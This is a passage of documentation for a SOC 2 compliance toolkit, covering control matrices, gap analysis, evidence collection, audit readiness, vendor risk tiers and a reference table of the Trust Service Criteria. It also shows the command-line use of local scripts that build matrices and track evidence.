| **P7** | Quality | Data accuracy verification, correction mechanisms |
| **P8** | Monitoring & Enforcement | Privacy program monitoring, complaint handling |
**Select when:** You process PII and customers expect privacy assurance (complements GDPR compliance).
---
## Control Matrix Generation
A control matrix maps each TSC criterion to specific controls, owners, evidence, and testing procedures.
### Matrix Structure
| Field | Description |
|-------|-------------|
| **Control ID** | Unique identifier (e.g., SEC-001, AVL-003) |
| **TSC Mapping** | Which criteria the control addresses (e.g., CC6.1, A1.2) |
| **Control Description** | What the control does |
| **Control Type** | Preventive, Detective, or Corrective |
| **Owner** | Responsible person/team |
| **Frequency** | Continuous, Daily, Weekly, Monthly, Quarterly, Annual |
| **Evidence Type** | Screenshot, Log, Policy, Config, Ticket |
| **Testing Procedure** | How the auditor verifies the control |
### Control Naming Convention
```
{CATEGORY}-{NUMBER}
SEC-001 through SEC-NNN → Security
AVL-001 through AVL-NNN → Availability
CON-001 through CON-NNN → Confidentiality
PRI-001 through PRI-NNN → Processing Integrity
PRV-001 through PRV-NNN → Privacy
```
### Workflow
1. Select applicable TSC categories based on business needs
2. Run `control_matrix_builder.py` to generate the baseline matrix
3. Customize controls to match your actual environment
4. Assign owners and evidence requirements
5. Validate coverage — every selected TSC criterion must have at least one control
---
## Gap Analysis Workflow
### Phase 1: Current State Assessment
1. **Document existing controls** — inventory all security policies, procedures, and technical controls
2. **Map to TSC** — align existing controls to Trust Service Criteria
3. **Collect evidence samples** — gather proof that controls exist and operate
4. **Interview control owners** — verify understanding and execution
### Phase 2: Gap Identification
Run `gap_analyzer.py` against your current controls to identify:
- **Missing controls** — TSC criteria with no corresponding control
- **Partially implemented** — Control exists but lacks evidence or consistency
- **Design gaps** — Control designed but does not adequately address the criteria
- **Operating gaps** (Type II only) — Control designed correctly but not operating effectively
### Phase 3: Remediation Planning
For each gap, define:
| Field | Description |
|-------|-------------|
| Gap ID | Reference identifier |
| TSC Criteria | Affected criteria |
| Gap Description | What is missing or insufficient |
| Remediation Action | Specific steps to close the gap |
| Owner | Person responsible for remediation |
| Priority | Critical / High / Medium / Low |
| Target Date | Completion deadline |
| Dependencies | Other gaps or projects that must complete first |
### Phase 4: Timeline Planning
| Priority | Target Remediation |
|----------|--------------------|
| Critical | 2-4 weeks |
| High | 4-8 weeks |
| Medium | 8-12 weeks |
| Low | 12-16 weeks |
---
## Evidence Collection
### Evidence Types by Control Category
| Control Area | Primary Evidence | Secondary Evidence |
|--------------|-----------------|-------------------|
| Access Management | User access reviews, provisioning tickets | Role matrix, access logs |
| Change Management | Change tickets, approval records | Deployment logs, test results |
| Incident Response | Incident tickets, postmortems | Runbooks, escalation records |
| Vulnerability Management | Scan reports, patch records | Remediation timelines |
| Encryption | Configuration screenshots, certificate inventory | Key rotation logs |
| Backup & Recovery | Backup logs, DR test results | Recovery time measurements |
| Monitoring | Alert configurations, dashboard screenshots | On-call schedules, escalation records |
| Policy Management | Signed policies, version history | Training completion records |
| Vendor Management | Vendor assessments, SOC 2 reports | Contract reviews, risk registers |
### Automation Opportunities
| Area | Automation Approach |
|------|-------------------|
| Access reviews | Integrate IAM with ticketing (automatic quarterly review triggers) |
| Configuration evidence | Infrastructure-as-code snapshots, compliance-as-code tools |
| Vulnerability scans | Scheduled scanning with auto-generated reports |
| Change management | Git-based audit trail (commits, PRs, approvals) |
| Uptime monitoring | Automated SLA dashboards with historical data |
| Backup verification | Automated restore tests with success/failure logging |
### Continuous Monitoring
Move from point-in-time evidence collection to continuous compliance:
1. **Automated evidence gathering** — scripts that pull evidence on schedule
2. **Control dashboards** — real-time visibility into control status
3. **Alert-based monitoring** — notify when a control drifts out of compliance
4. **Evidence repository** — centralized, timestamped evidence storage
---
## Audit Readiness Checklist
### Pre-Audit Preparation (4-6 Weeks Before)
- [ ] All controls documented with descriptions, owners, and frequencies
- [ ] Evidence collected for the entire observation period (Type II)
- [ ] Control matrix reviewed and gaps remediated
- [ ] Policies signed and distributed within the last 12 months
- [ ] Access reviews completed within the required frequency
- [ ] Vulnerability scans current (no critical/high unpatched > SLA)
- [ ] Incident response plan tested within the last 12 months
- [ ] Vendor risk assessments current for all subservice organizations
- [ ] DR/BCP tested and documented within the last 12 months
- [ ] Employee security training completed for all staff
### Readiness Scoring
| Score | Rating | Meaning |
|-------|--------|---------|
| 90-100% | Audit Ready | Proceed with confidence |
| 75-89% | Minor Gaps | Address before scheduling audit |
| 50-74% | Significant Gaps | Remediation required |
| < 50% | Not Ready | Major program build-out needed |
### Common Audit Findings
| Finding | Root Cause | Prevention |
|---------|-----------|-----------|
| Incomplete access reviews | Manual process, no reminders | Automate quarterly review triggers |
| Missing change approvals | Emergency changes bypass process | Define emergency change procedure with post-hoc approval |
| Stale vulnerability scans | Scanner misconfigured | Automated weekly scans with alerting |
| Policy not acknowledged | No tracking mechanism | Annual e-signature workflow |
| Missing vendor assessments | No vendor inventory | Maintain vendor register with review schedule |
---
## Vendor Management
### Third-Party Risk Assessment
Every vendor that accesses, stores, or processes customer data must be assessed:
1. **Vendor inventory** — maintain a register of all service providers
2. **Risk classification** — categorize vendors by data access level
3. **Due diligence** — collect SOC 2 reports, security questionnaires, certifications
4. **Contractual protections** — ensure DPAs, security requirements, breach notification clauses
5. **Ongoing monitoring** — annual reassessment, continuous news monitoring
### Vendor Risk Tiers
| Tier | Data Access | Assessment Frequency | Requirements |
|------|-------------|---------------------|-------------|
| Critical | Processes/stores customer data | Annual + continuous monitoring | SOC 2 Type II, penetration test, security review |
| High | Accesses customer environment | Annual | SOC 2 Type II or equivalent, questionnaire |
| Medium | Indirect access, support tools | Annual questionnaire | Security certifications, questionnaire |
| Low | No data access | Biennial questionnaire | Basic security questionnaire |
### Subservice Organizations
When your SOC 2 report relies on controls at a subservice organization (e.g., AWS, GCP, Azure):
- **Inclusive method** — your report covers the subservice org's controls (requires their cooperation)
- **Carve-out method** — your report excludes their controls but references their SOC 2 report
- Most companies use **carve-out**, referencing the subservice organization's complementary subservice organization controls (CSOCs) in their report and documenting complementary user entity controls (CUECs) for their own customers
---
## Continuous Compliance
### From Point-in-Time to Continuous
| Aspect | Point-in-Time | Continuous |
|--------|---------------|-----------|
| Evidence collection | Manual, before audit | Automated, ongoing |
| Control monitoring | Periodic review | Real-time dashboards |
| Drift detection | Found during audit | Alert-based, immediate |
| Remediation | Reactive | Proactive |
| Audit preparation | 4-8 week scramble | Always ready |
### Implementation Steps
1. **Automate evidence gathering** — cron jobs, API integrations, IaC snapshots
2. **Build control dashboards** — aggregate control status into a single view
3. **Configure drift alerts** — notify when controls fall out of compliance
4. **Establish review cadence** — weekly control owner check-ins, monthly steering
5. **Maintain evidence repository** — centralized, timestamped, auditor-accessible
### Annual Re-Assessment Cycle
| Quarter | Activities |
|---------|-----------|
| Q1 | Annual risk assessment, policy refresh, vendor reassessment launch |
| Q2 | Internal control testing, remediation of findings |
| Q3 | Pre-audit readiness review, evidence completeness check |
| Q4 | External audit, management assertion, report distribution |
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Better Approach |
|--------------|-------------|----------------|
| Point-in-time compliance | Controls degrade between audits; gaps found during audit | Implement continuous monitoring and automated evidence |
| Manual evidence collection | Time-consuming, inconsistent, error-prone | Automate with scripts, IaC, and compliance platforms |
| Missing vendor assessments | Auditors flag incomplete vendor due diligence | Maintain vendor register with risk-tiered assessment schedule |
| Copy-paste policies | Generic policies don't match actual operations | Tailor policies to your actual environment and technology stack |
| Security theater | Controls exist on paper but aren't followed | Verify operating effectiveness; build controls into workflows |
| Skipping Type I | Jumping to Type II without foundational readiness | Start with Type I to validate control design before observation |
| Over-scoping TSC | Including all 5 categories when only Security is needed | Select categories based on actual customer/business requirements |
| Treating audit as a project | Compliance degrades after the report is issued | Build compliance into daily operations and engineering culture |
---
## Tools
### Control Matrix Builder
Generates a SOC 2 control matrix from selected TSC categories.
```bash
# Generate full security matrix in markdown
python scripts/control_matrix_builder.py --categories security --format md
# Generate matrix for multiple categories as JSON
python scripts/control_matrix_builder.py --categories security,availability,confidentiality --format json
# All categories, CSV output
python scripts/control_matrix_builder.py --categories security,availability,confidentiality,processing-integrity,privacy --format csv
```
### Evidence Tracker
Tracks evidence collection status per control.
```bash
# Check evidence status from a control matrix
python scripts/evidence_tracker.py --matrix controls.json --status
# JSON output for integration
python scripts/evidence_tracker.py --matrix controls.json --status --json
```
### Gap Analyzer
Analyzes current controls against SOC 2 requirements and identifies gaps.
```bash
# Type I gap analysis
python scripts/gap_analyzer.py --controls current_controls.json --type type1
# Type II gap analysis (includes operating effectiveness)
python scripts/gap_analyzer.py --controls current_controls.json --type type2 --json
```
---
## References
- [Trust Service Criteria Reference](references/trust_service_criteria.md) — All 5 TSC categories with sub-criteria, control objectives, and evidence examples
- [Evidence Collection Guide](references/evidence_collection_guide.md) — Evidence types per control, automation tools, documentation requirements
- [Type I vs Type II Comparison](references/type1_vs_type2.md) — Detailed comparison, timeline, cost analysis, and upgrade path
---
## Cross-References
- **[gdpr-dsgvo-expert](../gdpr-dsgvo-expert/SKILL.md)** — SOC 2 Privacy criteria overlaps significantly with GDPR requirements; use together when processing EU personal data
- **[information-security-manager-iso27001](../information-security-manager-iso27001/SKILL.md)** — ISO 27001 Annex A controls map closely to SOC 2 Security criteria; organizations pursuing both can share evidence
- **[isms-audit-expert](../isms-audit-expert/SKILL.md)** — Audit methodology and finding management patterns transfer directly to SOC 2 audit preparation

---
<!-- File: references/evidence_collection_guide.md -->
# SOC 2 Evidence Collection Guide
Practical guide for collecting, organizing, and maintaining audit evidence for SOC 2 Type I and Type II engagements. Covers evidence types, automation strategies, and documentation requirements.
---
## Evidence Fundamentals
### What Auditors Look For
1. **Existence** — The control is documented and exists
2. **Design effectiveness** — The control is designed to address the TSC criterion (Type I + Type II)
3. **Operating effectiveness** — The control operates consistently over the observation period (Type II only)
### Evidence Quality Criteria
| Criterion | Description |
|-----------|-------------|
| **Relevant** | Directly demonstrates the control's operation |
| **Reliable** | Generated by systems or independent parties (not self-reported) |
| **Timely** | Falls within the audit/observation period |
| **Sufficient** | Enough samples to demonstrate consistency |
| **Complete** | Covers the full population or a representative sample |
### Evidence Types
| Type | Description | Examples |
|------|-------------|---------|
| **Inquiry** | Verbal or written descriptions from personnel | Interview notes, written responses |
| **Observation** | Auditor witnesses control in operation | Process walkthroughs, live demonstrations |
| **Inspection** | Review of documents, records, or configurations | Policy documents, system screenshots, logs |
| **Re-performance** | Auditor re-executes the control to verify results | Access review validation, configuration checks |
---
## Evidence by Control Area
### Access Management
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Access provisioning | Provisioning policy, role matrix | Sample provisioning tickets with approvals (full period) |
| Access removal | Termination checklist, deprovisioning SOP | Sample termination events with access removal timestamps |
| Access reviews | Review policy, review template | Completed quarterly access review reports with sign-offs |
| MFA enforcement | MFA policy, configuration screenshot | MFA enrollment report showing 100% coverage |
| Privileged access | Privileged access policy, admin list | Quarterly privileged access reviews, admin activity logs |
### Change Management
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Change authorization | Change management policy, workflow description | Sample change tickets with approvals, peer reviews |
| Testing requirements | Testing policy, test plan template | Test results for sampled changes, QA sign-offs |
| Emergency changes | Emergency change procedure | Emergency change tickets with post-hoc approvals |
| Deployment process | CI/CD documentation, deployment runbook | Deployment logs, rollback records |
| Code review | Code review policy | Pull request histories showing reviewer approvals |
### Incident Response
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| IR plan | Incident response plan document | Plan review/update records, version history |
| IR testing | Tabletop exercise schedule | Tabletop exercise reports, lessons learned |
| Incident handling | Triage procedures, classification criteria | Incident tickets with timestamps, escalation records |
| Postmortems | Postmortem template, review process | Completed postmortem documents, follow-up actions |
| Communication | Communication plan, stakeholder list | Notification records, status page updates |
### Vulnerability Management
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Scanning | Scanning schedule, tool configuration | Scan reports covering the full period (weekly/monthly) |
| Remediation SLAs | Remediation policy with SLA definitions | Remediation tracking showing SLA compliance rates |
| Patch management | Patching policy, schedule | Patch records, before/after scan comparisons |
| Penetration testing | Pentest policy, scope definition | Pentest reports (annual), remediation records |
### Encryption and Data Protection
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Encryption at rest | Encryption policy, configuration docs | Configuration screenshots, encryption audit reports |
| Encryption in transit | TLS policy, minimum version requirements | TLS scan results, certificate inventory |
| Key management | Key management policy, rotation schedule | Key rotation logs, access records for key stores |
| DLP | DLP policy, tool configuration | DLP alert logs, incident records, exception approvals |
### Backup and Recovery
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Backup procedures | Backup policy, schedule, retention rules | Backup success/failure logs (daily), retention compliance |
| DR planning | DR plan, recovery procedures | DR plan review records, update history |
| DR testing | DR test schedule, test plan | DR test reports with RTO/RPO measurements |
| BCP | BCP document, communication tree | BCP review records, test results |
### Monitoring and Logging
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| SIEM/logging | Logging policy, SIEM configuration | Log retention evidence, alert samples, dashboard screenshots |
| Alert management | Alert rules, escalation procedures | Alert trigger samples, response records |
| Uptime monitoring | Monitoring tool configuration, SLA definitions | Uptime reports covering the full period |
| Anomaly detection | Detection rules, baseline configuration | Detection events, investigation records |
### Policy and Governance
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Security policies | Policy library, version control | Policy acknowledgment records, annual review evidence |
| Security training | Training program description, content | Training completion records (all employees) |
| Risk assessment | Risk assessment methodology | Annual risk assessment report, risk register updates |
| Board oversight | Committee charter, reporting schedule | Board meeting minutes, security reports to leadership |
### Vendor Management
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Vendor inventory | Vendor register, classification criteria | Current vendor register with risk tiers |
| Vendor assessment | Assessment questionnaire, criteria | Completed assessments, vendor SOC reports collected |
| Contractual controls | DPA template, security requirements | Signed DPAs, contract review records |
| Ongoing monitoring | Monitoring schedule, reassessment triggers | Reassessment records, monitoring reports |
---
## Evidence Automation
### Automated Evidence Sources
| Evidence | Automation Approach | Tools |
|----------|-------------------|-------|
| Access reviews | Scheduled IAM exports, automated review workflows | Okta, Azure AD, AWS IAM + Jira/ServiceNow |
| Configuration compliance | Infrastructure-as-code, policy-as-code scanning | Terraform, OPA, AWS Config, Azure Policy |
| Vulnerability scans | Scheduled scanning with report auto-generation | Nessus, Qualys, Snyk, Dependabot |
| Change management | Git-based audit trails (commits, PRs, approvals) | GitHub, GitLab, Bitbucket |
| Uptime monitoring | Continuous synthetic monitoring with SLA dashboards | Datadog, New Relic, PagerDuty, Pingdom |
| Backup verification | Automated backup validation and restore tests | AWS Backup, Veeam, custom scripts |
| Training completion | LMS with automated tracking and reminders | KnowBe4, Curricula, custom LMS |
| Policy acknowledgment | Digital signature workflows with tracking | DocuSign, HelloSign, internal tools |
### Evidence Collection Script Pattern
```
1. Define evidence requirements per control
2. Map each requirement to a data source (API, log, screenshot)
3. Schedule automated collection (daily/weekly/monthly)
4. Store evidence with timestamps in a central repository
5. Generate collection status dashboard
6. Alert on missing or overdue evidence
```
### Evidence Repository Structure
```
evidence/
├── {year}-{audit-period}/
│ ├── access-management/
│ │ ├── quarterly-access-review-Q1.pdf
│ │ ├── quarterly-access-review-Q2.pdf
│ │ ├── mfa-enrollment-report-2025-03.png
│ │ └── provisioning-samples/
│ ├── change-management/
│ │ ├── change-ticket-samples/
│ │ └── deployment-logs/
│ ├── incident-response/
│ │ ├── ir-plan-v3.2.pdf
│ │ ├── tabletop-exercise-2025-06.pdf
│ │ └── incident-tickets/
│ ├── vulnerability-management/
│ │ ├── scan-reports/
│ │ └── pentest-report-2025.pdf
│ ├── policies/
│ │ ├── information-security-policy-v4.pdf
│ │ └── acknowledgment-records/
│ └── vendor-management/
│ ├── vendor-register.csv
│ └── vendor-assessments/
```
---
## Sampling Methodology
Auditors use sampling to test operating effectiveness. Understanding the methodology helps you prepare the right volume of evidence.
### Sample Sizes by Control Frequency
| Control Frequency | Population Size (per period) | Typical Sample Size |
|-------------------|------------------------------|-------------------|
| Annual | 1 | 1 (all items) |
| Quarterly | 4 | 2-4 |
| Monthly | 6-12 | 2-5 |
| Weekly | 26-52 | 5-15 |
| Daily | 180-365 | 20-40 |
| Continuous/per-event | Varies | 25-60 |
### Key Sampling Rules
1. **Higher frequency = larger sample** — more occurrences mean more samples needed
2. **Automated controls** — typically only 1 sample needed if the system is validated
3. **Exceptions must be explained** — any deviation in a sample requires documentation
4. **Population completeness** — you must provide the full population for the auditor to select from
---
## Type I vs Type II Evidence Differences
| Aspect | Type I | Type II |
|--------|--------|---------|
| **Time scope** | Single point in time | Entire observation period (3-12 months) |
| **Volume** | Lower — policies and configurations | Higher — ongoing logs, tickets, reports |
| **Focus** | "Is the control designed properly?" | "Did the control operate effectively?" |
| **Exceptions** | N/A | Must document and explain every exception |
| **Owner sign-off** | Policy approval records | Ongoing review sign-offs throughout the period |
---
## Common Evidence Pitfalls
| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| Screenshots without timestamps | Auditor cannot verify timing | Always include system clock or date stamps |
| Policies without version control | Cannot prove current vs outdated | Use document management with version tracking |
| Access reviews without sign-off | Cannot prove review was completed | Require digital approval/sign-off on every review |
| Gaps in monitoring data | Suggests control was not operating | Ensure logging continuity; document any outages |
| Evidence from wrong period | Does not cover the observation window | Verify date ranges before submission |
| Redacted evidence without explanation | Auditor may question completeness | Provide redaction rationale and methodology |
| Self-generated evidence only | Lower reliability in auditor's assessment | Include system-generated and third-party evidence |
| Missing exception documentation | Auditor flags as control failure | Document every exception with root cause and remediation |

---
<!-- File: references/trust_service_criteria.md -->
# SOC 2 Trust Service Criteria Reference
Comprehensive reference for all five AICPA Trust Service Criteria (TSC) categories. Each criterion includes its objective, sub-criteria, typical controls, and evidence examples.
---
## 1. Security (Common Criteria) — Required
The Security category is mandatory for every SOC 2 engagement. Its common criteria are organized into nine groups (CC1-CC9): CC1-CC5 correspond to the 17 COSO 2013 internal control principles, while CC6-CC9 are supplemental criteria covering access, operations, change management, and risk mitigation.
### CC1 — Control Environment
Establishes the foundation for all other components of internal control.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC1.1 | Demonstrate commitment to integrity and ethical values | Code of conduct, ethics hotline, background checks | Signed code of conduct, hotline reports, screening records |
| CC1.2 | Board exercises oversight of internal control | Independent board/committee, regular reporting | Board meeting minutes, committee charters, oversight reports |
| CC1.3 | Management establishes structure and reporting lines | Organizational charts, role definitions, RACI matrices | Org charts, job descriptions, authority matrices |
| CC1.4 | Commitment to attract, develop, and retain competent individuals | Training programs, competency assessments, career development | Training completion records, skills assessments, HR policies |
| CC1.5 | Hold individuals accountable for internal control responsibilities | Performance evaluations, disciplinary procedures | Performance review records, accountability documentation |
### CC2 — Communication and Information
Ensures relevant, quality information flows internally and externally.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC2.1 | Obtain and generate relevant quality information | Data classification, information quality standards | Classification policy, data quality reports |
| CC2.2 | Internally communicate information and responsibilities | Internal newsletters, policy distribution, security awareness | Communication logs, training materials, acknowledgment records |
| CC2.3 | Communicate with external parties | Customer notifications, vendor communications, incident notices | External communication policy, notification records, status pages |
### CC3 — Risk Assessment
Identifies and assesses risks that may prevent achievement of objectives.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC3.1 | Specify objectives to identify and assess risks | Risk management framework, risk appetite statement | Risk methodology document, risk appetite approval |
| CC3.2 | Identify and analyze risks | Risk assessments, threat modeling, vulnerability analysis | Risk register, threat models, assessment reports |
| CC3.3 | Consider potential for fraud | Fraud risk assessment, segregation of duties | Fraud risk report, SoD matrix, anti-fraud controls |
| CC3.4 | Identify and assess changes impacting internal control | Change impact analysis, environmental scanning | Change assessments, business impact analyses |
### CC4 — Monitoring Activities
Ongoing evaluations to verify internal controls are present and functioning.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC4.1 | Select and perform ongoing and separate evaluations | Continuous monitoring, internal audits, control testing | Monitoring dashboards, audit reports, testing results |
| CC4.2 | Evaluate and communicate deficiencies | Deficiency tracking, remediation management, management reporting | Deficiency logs, remediation plans, management reports |
### CC5 — Control Activities
Policies and procedures that ensure management directives are carried out.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC5.1 | Select and develop control activities that mitigate risks | Risk-based control selection, control design documentation | Control matrix, risk treatment plans |
| CC5.2 | Select and develop technology controls | IT general controls, automated controls, technology governance | ITGC documentation, technology policies, automated control configs |
| CC5.3 | Deploy control activities through policies and procedures | Policy library, procedure documentation, acknowledgment tracking | Policy repository, version history, signed acknowledgments |
### CC6 — Logical and Physical Access Controls
Restrict logical and physical access to information assets.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC6.1 | Logical access security over protected assets | IAM platform, SSO, MFA enforcement | IAM configuration, SSO settings, MFA enrollment reports |
| CC6.2 | Access provisioning based on role and need | Role-based access, provisioning workflows, approval chains | Provisioning tickets, role matrix, approval records |
| CC6.3 | Access removal on termination or role change | Offboarding checklists, automated deprovisioning | Deprovisioning tickets, termination checklists, access removal logs |
| CC6.4 | Periodic access reviews | Quarterly user access reviews, entitlement validation | Access review reports, entitlement listings, sign-off records |
| CC6.5 | Physical access restrictions | Badge systems, visitor management, secure areas | Badge access logs, visitor logs, physical access policies |
| CC6.6 | Encryption of data in transit and at rest | TLS enforcement, disk encryption, key management | TLS configuration, encryption settings, key rotation records |
| CC6.7 | Data transmission and movement restrictions | DLP tools, network segmentation, firewall rules | DLP configuration, network diagrams, firewall rule sets |
| CC6.8 | Prevention/detection of unauthorized software | Endpoint protection, application whitelisting, malware scanning | EDR configuration, whitelist policies, scan reports |
### CC7 — System Operations
Detect and mitigate security events and anomalies.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC7.1 | Vulnerability identification and management | Vulnerability scanning, patch management, remediation SLAs | Scan reports, patch records, SLA compliance metrics |
| CC7.2 | Monitor for anomalies and security events | SIEM, IDS/IPS, behavioral analytics | SIEM dashboards, alert rules, detection logs |
| CC7.3 | Security event evaluation and classification | Incident classification criteria, triage procedures | Classification matrix, triage logs, escalation records |
| CC7.4 | Incident response execution | Incident response plan, response team, communication procedures | IR plan, incident tickets, communication records |
| CC7.5 | Incident recovery and lessons learned | Recovery procedures, post-incident reviews, plan updates | Recovery records, postmortem reports, plan revision history |
### CC8 — Change Management
Authorize, design, develop, test, and implement changes to infrastructure and software.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC8.1 | Change authorization, testing, and approval | Change management process, approval workflows, testing requirements | Change tickets, approval records, test results, deployment logs |
### CC9 — Risk Mitigation
Manage risks associated with business disruption, vendors, and partners.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC9.1 | Vendor and business partner risk management | Vendor assessment program, third-party risk management | Vendor risk assessments, vendor register, vendor SOC reports |
| CC9.2 | Risk mitigation through transfer mechanisms | Cyber insurance, contractual protections | Insurance certificates, contract provisions |
---
## 2. Availability (A1) — Optional
Addresses system uptime, performance, and recoverability commitments.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| A1.1 | Capacity and performance management | Auto-scaling, resource monitoring, capacity planning | Capacity dashboards, scaling policies, resource utilization trends |
| A1.2 | Recovery operations | Backup procedures, DR planning, BCP documentation | Backup logs, DR plan, BCP documentation, recovery procedures |
| A1.3 | Recovery testing | DR drills, failover tests, RTO/RPO validation | DR test reports, failover results, RTO/RPO measurements |
### When to Include Availability
- Your customers depend on your service uptime
- You have SLAs with financial penalties for downtime
- Your service is in the critical path of customer operations
- You provide infrastructure or platform services
### Key Metrics
| Metric | Description | Typical Target |
|--------|-------------|----------------|
| RTO | Recovery Time Objective — max acceptable downtime | 1-4 hours |
| RPO | Recovery Point Objective — max acceptable data loss | 1-24 hours |
| SLA | Service Level Agreement — uptime commitment | 99.9%-99.99% |
| MTTR | Mean Time to Recovery — average recovery duration | < 1 hour |
---
## 3. Confidentiality (C1) — Optional
Protects information designated as confidential throughout its lifecycle.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| C1.1 | Identification of confidential information | Data classification scheme, confidential data inventory | Classification policy, data inventory, labeling standards |
| C1.2 | Protection of confidential information | Encryption, access restrictions, DLP, secure transmission | Encryption configs, ACLs, DLP rules, secure transfer logs |
| C1.3 | Disposal of confidential information | Secure deletion, media sanitization, retention enforcement | Disposal procedures, sanitization certificates, deletion logs |
### When to Include Confidentiality
- You handle trade secrets or proprietary business information
- Contracts require confidentiality assurance
- You process data classified above "public" in your classification scheme
- Customers share confidential data for processing
### Data Classification Levels
| Level | Description | Handling Requirements |
|-------|-------------|----------------------|
| Public | No restrictions | No special controls |
| Internal | Business use only | Access controls, basic encryption |
| Confidential | Restricted access | Strong encryption, DLP, access reviews |
| Highly Confidential | Strictly controlled | Strongest encryption, MFA, audit logging, need-to-know |
---
## 4. Processing Integrity (PI1) — Optional
Ensures system processing is complete, valid, accurate, timely, and authorized.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| PI1.1 | Processing accuracy | Input validation, data integrity checks, output verification | Validation rules, integrity check logs, reconciliation reports |
| PI1.2 | Processing completeness | Transaction monitoring, completeness checks, reconciliation | Transaction logs, batch processing reports, reconciliation records |
| PI1.3 | Processing timeliness | SLA monitoring, batch job scheduling, processing alerts | SLA reports, job schedules, processing time metrics |
| PI1.4 | Processing authorization | Authorization controls, segregation of duties, approval workflows | Authorization matrix, SoD analysis, approval records |
### When to Include Processing Integrity
- You perform financial calculations or transactions
- Data accuracy is critical to customer operations
- You provide analytics or reporting that drives business decisions
- Regulatory requirements demand processing accuracy (e.g., healthcare, finance)
### Validation Checkpoints
| Stage | Validation | Method |
|-------|-----------|--------|
| Input | Data format, range, completeness | Automated validation rules |
| Processing | Calculation accuracy, transformation correctness | Unit tests, reconciliation |
| Output | Report accuracy, data completeness | Cross-checks, manual review, checksums |
| Transfer | Transmission integrity, completeness | Hash verification, acknowledgment protocols |
---
## 5. Privacy (P1-P8) — Optional
Governs the collection, use, retention, disclosure, and disposal of personal information. Closely aligns with GDPR, CCPA, and other privacy regulations.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| P1.1 | Notice — inform data subjects about data practices | Privacy policy, collection notices, purpose statements | Published privacy policy, collection banners, purpose documentation |
| P2.1 | Choice and consent — provide opt-in/opt-out mechanisms | Consent management, preference centers, granular consent | Consent records, preference logs, opt-out mechanisms |
| P3.1 | Collection — collect only necessary personal information | Data minimization, lawful basis documentation, purpose specification | Collection audits, lawful basis records, data flow diagrams |
| P4.1 | Use, retention, and disposal — limit use and enforce retention | Purpose limitation, retention schedules, automated deletion | Use restriction controls, retention policies, deletion logs |
| P4.2 | Disposal — secure disposal when no longer needed | Secure deletion, media sanitization | Disposal certificates, sanitization records |
| P5.1 | Access — provide data subjects access to their data | DSAR processing, data portability, access portals | DSAR logs, response timelines, export capabilities |
| P5.2 | Correction — allow data subjects to correct their data | Correction request processing, data update mechanisms | Correction logs, update records |
| P6.1 | Disclosure — control third-party data sharing | Data sharing agreements, third-party inventory, DPAs | DPAs, sharing agreements, third-party register |
| P6.2 | Notification — notify of breaches affecting personal data | Breach notification procedures, regulatory reporting | Breach response plan, notification records, reporting logs |
| P7.1 | Quality — maintain accurate personal information | Data quality checks, accuracy verification, correction mechanisms | Quality reports, accuracy audits, correction records |
| P8.1 | Monitoring — monitor privacy program effectiveness | Privacy audits, compliance reviews, complaint tracking | Audit reports, compliance dashboards, complaint logs |
### When to Include Privacy
- You process personal information (PII) of end users or customers
- You operate in jurisdictions with privacy regulations (GDPR, CCPA, LGPD)
- Customers request privacy assurance as part of vendor assessment
- Your service involves health, financial, or other sensitive personal data
### Privacy Criteria Overlap with GDPR
| SOC 2 Privacy | GDPR Article | Alignment |
|---------------|-------------|-----------|
| P1 (Notice) | Art. 13-14 | Direct — transparency requirements |
| P2 (Consent) | Art. 6-7 | Direct — lawful basis and consent |
| P3 (Collection) | Art. 5(1)(b-c) | Direct — purpose limitation, minimization |
| P4 (Retention) | Art. 5(1)(e) | Direct — storage limitation |
| P5 (Access) | Art. 15-16 | Direct — data subject rights |
| P6 (Disclosure) | Art. 33-34 | Direct — breach notification |
| P7 (Quality) | Art. 5(1)(d) | Direct — accuracy principle |
| P8 (Monitoring) | Art. 5(2) | Direct — accountability principle |
---
## TSC Selection Guide
| Question | If Yes, Include |
|----------|----------------|
| Do you store/process customer data? | Security (required) |
| Do customers depend on your uptime? | Availability |
| Do you handle confidential business data? | Confidentiality |
| Is data accuracy critical to your service? | Processing Integrity |
| Do you process personal information? | Privacy |
### Common Combinations
| Company Type | Typical TSC Selection |
|-------------|----------------------|
| SaaS platform | Security + Availability |
| Data analytics | Security + Processing Integrity + Confidentiality |
| Healthcare SaaS | Security + Availability + Privacy + Confidentiality |
| Financial services | Security + Availability + Processing Integrity + Confidentiality |
| Infrastructure/PaaS | Security + Availability |
| HR/Payroll SaaS | Security + Availability + Privacy |
---
## Mapping to Other Frameworks
| SOC 2 Criteria | ISO 27001 | NIST CSF | HIPAA | PCI DSS |
|---------------|-----------|----------|-------|---------|
| CC1 (Control Environment) | A.5 (Policies) | ID.GV | Administrative Safeguards | Req 12 |
| CC2 (Communication) | A.5.1 (Policies) | ID.GV | Administrative Safeguards | Req 12 |
